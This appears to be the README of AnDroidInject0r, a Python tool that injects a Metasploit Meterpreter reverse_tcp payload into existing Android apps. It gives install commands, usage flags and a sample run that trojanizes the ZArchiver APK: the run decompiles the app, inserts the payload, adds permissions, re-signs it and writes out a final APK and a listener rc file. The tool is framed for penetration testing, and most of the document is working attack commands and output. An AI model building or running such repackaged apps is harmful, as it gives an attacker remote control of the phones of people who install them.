AnDroidInject0r is a Python script to inject existing Android applications with a Meterpreter payload. It can be used during penetrating testing or security assessments.
[+] AUTOR: Yasser Janah
[+] GITHUB: https://github.com/yasserjanah
[+] TWITTER: https://twitter.com/th3x0ne
[+] FACEBOOK: https://fb.com/yasser.janah0
Firstly get the code:
git clone https://github.com/yasserjanah/AnDroidInject0r.git
cd AnDroidInject0r/
chmod +x install_requirements.sh
./install_requirements.sh
Usage: python2 AnDroidInject0r.py -p [PAYLOAD] --lhost=[LHOST] --lport=[PORT] --apkfile=[APKFILE]
<< Coded by : Yasser Janah >>
<< Facebook : https://facebook.com/yasser.janah >>
<< Twitter : https://twitter.com/yasser_janah >>
<< Github : https://github.com/yasserjanah/ >>
-p , --payload a metasploit android payload (e.x android/meterpreter/reverse_tcp) (not required)
-lh , --lhost The listen address (not required)
-lp , --lport The listen port (default 4444)
-ap , --apkfile path of apkfile (required!!)
$ ./AnDroidInject0r.py --apkfile zarchiver0-8-3.apk
[*] payload not selected .. default 'android/meterpreter/reverse_tcp'
[*] LHOST not selected .. using '192.168.43.230'
[*] LPORT not selected .. using '4444'
[+] Generating payload: Generated.
[+] Decompling payload: Decompiled.
[+] Decompling 'zarchiver0-8-3.apk': Decompiled.
[+] Copying payload files into 'zarchiver0-8-3.apk': Done.
[*] Parsing AndroidManifest file
[*] Activity PATH : 'ru/zdevs/zarchiver'
[*] SMALI File : 'ZArchiver.smali'
[+] Injecting payload into 'zarchiver0-8-3.apk': Injected.
[+] Get Permissions from payload AndroidManifest file: Done.
[+] Add Permissions into 'zarchiver0-8-3.apk' AndroidManifest file: Permissions Added.
[+] Recompling 'zarchiver0-8-3.apk': Recompiled.
[+] Signing 'zarchiver0-8-3.apk': Signed.
[+] metasploit rc file : '/home/mcsc/Droid_Inject0r/droid_apk.rc'
[+] final apk : '/home/mcsc/Droid_Inject0r/zarchiver0-8-3-final.apk'